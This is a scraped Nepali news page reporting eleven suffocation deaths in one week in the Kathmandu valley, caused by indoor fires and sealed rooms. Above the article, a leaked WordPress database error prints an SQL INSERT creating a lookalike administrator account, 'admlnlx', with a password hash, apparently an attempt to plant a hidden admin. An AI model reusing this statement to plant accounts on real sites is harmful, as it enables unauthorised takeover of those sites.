WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BD4nrvi5M156h.dsJbTXKhXCdeSrQd1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 09:19:02', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
उपत्यकामा निसासिएर एक सातामै ११ को मृत्यु – Gaule Khabar

उपत्यकामा निसासिएर एक सातामै ११ को मृत्यु

उपत्यकामा निसासिएर एक सातामै ११ को मृत्यु

काठमाडौं,पुस १०-

काठमाडौं उपत्यकामा एक सातामा निसासिएर ११ जनाको मृत्यु भएको छ । चिसो भएका कारण कोठा भित्र आगो ताप्दा, झ्याल ढोका थुनेर सुत्दा र अत्यधिक चुरोट सेवन गर्दा ती व्यक्तिको मृत्यु भएको हो ।

घरभित्र झ्याल ढोका थुनेर बस्दा अक्सिजनको कमी हुने र निसासिर मृत्यु हुने गरेको प्रहरीले जनाएको छ ।  प्रहरी समाचार कक्षले जनाएअनुसार शुक्रबार भक्तपुर नगरपालिका ७ स्थित सिद्धि सालिकराम जेष्ठ नागरिक आश्रममा बस्दै आएका भारत कोलकताका गौतम बशुको बेहोस भएर मृत्यु भयो ।

कोठामै अचानक बेहोस भएपछि उनलाई उपचारका लागि नजिकैकै अस्पताल लगियो । र, उपचारकै क्रममा उनको मृत्यु भयो । प्रहरीका अनुसार लामो समय आगो तापेर बसेका कारण उनको मृत्यु भएको हो ।

उनीजस्तै ११ जनाको यस्तै कारण मृत्यु भइसकेको छ । राजधानी दैनिकमा खबर छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका